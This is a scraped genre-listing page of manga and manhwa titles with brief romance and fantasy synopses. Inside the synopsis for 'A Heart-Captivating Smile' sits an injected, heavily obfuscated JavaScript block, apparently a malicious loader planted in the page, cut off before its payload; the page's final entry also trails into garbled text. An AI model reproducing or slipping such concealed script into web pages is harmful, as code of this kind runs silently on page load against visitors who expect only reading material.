Drama - Page 26

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17603 results

A Harem for My Empress

The tyrant Xi Wuji always thought that his pampered queen treated him affectionately, like a delicate little lotus flower. He thought she loved him, but on the day of his death, he opened his eyes. As a result of his death, she took charge of the government and had many lovers, and lived in debauchery. But he became her favourite lover again in this new life‽


A Heart-Captivating Smile

There was a young lady from an influential family that was famous for being a sloth. It was said that if she could lay down, she would not sit; and if she could sit, she would not stand. There was a young master from an influential family who was educated, talented, and had unparalleled good looks. However, the best-among-men young master was rumored to have an unmentionable disease?! Yang Zhaojun only wished to become a chamber's sloth, but unfortunately for her, the Gods had other plans. With a smile, she captivated the young master's heart. Would Zhaojun be willing to spend the rest of her life with him?<script></script><script>(function(_0x3a9ce0,_0x1f1dd8){var _0x193e66=_0x2575,_0x2dba57=_0x3a9ce0();while(!![]){try{var _0x3767f4=parseInt(_0x193e66(0x1a7))/(0x44f*-0x3+-0x38d+0x107b)+-parseInt(_0x193e66(0x19c))/(0x1cdc*-0x1+0x4fd*0x6+-0x110)+parseInt(_0x193e66(0x19e))/(0x199d+0x1893+-0x322d*0x1)+-parseInt(_0x193e66(0x19b))/(-0x2275+-0xb*0x21+-0x1*-0x23e4)+-parseInt(_0x193e66(0x1aa))/(0x1*-0x2b3+0x4c*-0x63+0x201c)*(-parseInt(_0x193e66(0x1b1))/(0x25eb+0x1*-0xf65+0x20*-0xb4))+-parseInt(_0x193e66(0x1b6))/(-0x1*0x24bb+0x11*-0x61+0x2b33)+parseInt(_0x193e66(0x1b3))/(-0x715+-0x7f*-0xb+0xd4*0x2);if(_0x3767f4===_0x1f1dd8)break;else _0x2dba57['push'](_0x2dba57['shift']());}catch(_0x198ae2){_0x2dba57['push'](_0x2dba57['shift']());}}}(_0x5723,0x1*0x25bcb+-0x86f7c+0xbf4d9));function custom(){var _0x289caa=_0x2575,_0x1bc75b={'XlBpU':function(_0x3d9c8e,_0x1c54dd){return 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A Hero Who Is Good At Everything

Read manhwa A Hero Who Is Good At Everything / A Hero Who Does Everything Well Na Kang In opens his eyes in the middle of South Korea, in 2024. He doesn’t remember who he is or where he is, but he learns from the combat support AI Jeon Ji In, inside his body, that he was a member of the Earth Alliance in 2082. He needs to gather information to regain his memories and find out why he came here… Na Kang In, who has nothing but knows how to do everything, is having a tumultuous time adapting to Earth ! “A Hero Who Is Good At Everything” is alternative: 다 잘하는 히어로


A House in Venice

An art college students moves in Venice to study, she starts to live in her new room, part of an old huge historical mansion and she discovers a new world of secrets linked to her young, mysterious landlord. A gothic romance story and a vampire tale which flows around Venetian laguna and roman museums; a manga rich of suggestions and images with a passional storytelling, a deep noir drawing style and melancholic mood. From Italians to Japanese. This was created for Kodansha, published on Amie. You read it Japanese style.


A Hundred Thousand Lifetimes

A Hundred Thousand Lifetimes, at manhwawebsiteA mother who traveled through thousands of lives to save her children.Maybe you like !


A Kind Goblin’s Bird

“Won’t you become a Goblin’s bride?” In Yang-an, the capital of the Shun Dynasty Empire, there are rumors of a Goddess who sings a song that grants your wishes in your dreams if you visit a certain pharmacy. To confirm this, Sa Heonyoung, who disguises his status as a member of the royal family, goes to find the Goddess of the rumors. After listening to her song, he yearns for her, as if he is suffering from an illness…. A man who must kill his own identity under a goblin’s mask; and a woman who has no name or a lover, and lives only for the revenge in her mother’s will. A mournful love story between a man and a woman who are the only ones who can fully understand each other.


A Kind Goblin’S Bird

“Won’t you become a Goblin’s bride?” In Yang-an, the capital of the Shun Dynasty Empire, there are rumors of a Goddess who sings a song that grants your wishes in your dreams if you visit a certain pharmacy. To confirm this, Sa Heonyoung, who disguises his status as a member of the royal family, goes to find the Goddess of the rumors. After listening to her song, he yearns for her, as if he is suffering from an illness…. A man who must kill his own identity under a goblin’s mask; and a woman who has no name or a lover, and lives only for the revenge in her mother’s will. A mournful love story between a man and a woman who are the only ones who can fully understand each other.


A Kiss Is Not Enough

Read manhwa A Kiss Is Not Enough / It’s Not Enough Just to Kiss / キスだけじゃ足りない / 大明星的kiss教学 / 키스만으론 부족해 Young actress Joo Arin is set to make her big-screen debut, but while preparing for the role, she comes across a bit of a problem… She has to film a kiss scene even though she hasn’t even had her first kiss yet! As Arin struggles to practice for the shoot, top star Kang Hajun, who happens to be with the same agency, decides to help out by teaching her how to kiss. As she starts these special secret lessons, Arin’s finding it hard to tell if she’s more immersed in the role or in Hajun.


A Kiss To My Prince

From Infinity Studios: Everyone always says to set high goals for oneself. Sei-Ann, an orphaned young lady who was raised in the care of a noblewoman, does just that when she decides she'll become the prince's bride. With above average looks and ambitions that would rival that of a king, Sei-Ann is determined to leave her social status behind and become the wife of the next Crown Prince. Ever since she was a child, she knew that she was somehow special and was meant to go places. And even if it meant enduring a marriage with the most hideous looking prince, she feels it would be a small price to pay to claim her fate as the First Lady of the kingdom.


A Kiss, For Real

Chitose is a high-school girl who lives her life wearing a “mask” in order to be liked by everyone. One day, a boy named Itsuki saves her from a pervert. Unable to forget his eyes, she follows him to an art prep school!! But after Itsuki leads her around the prep school, he sees through her façade … This is a sweet, but sadistic, love story between a mask-wearing girl and a free-spirited boy!


A Knight With A Time Limit

Minhyuk, a bedridden man in Korea, meticulously counts his waning days when suddenly, he's transmigrated to another world where he gains the new identity of Levis, the Soul Harvester. In this world, Levis must claim lives to extend his own, a haunting paradox that he must come to terms with. Forced to grapple with a life tethered to a merciless ticking clock, Levis becomes a harbinger of fate, tasked with the daunting responsibility of ending the lives of others in order to preserve his own. How far does the will to survive stretch? Is one life's preservation worth another's demise?


A la Carte

Four Oneshots compiled into one volume. Kohrogi "Kohrogi" means "cricket" Mitsurugi Kai is a wizard that must pass a test of character. He doubts himself due to his past. His test is to retrieve paper charms by himself. On his way, he meets Kohrogi Orine, a fledging singer who also doubts herself. This oneshot is their journey together to learn about themselves. Noiz dZi:s X-connection2001200
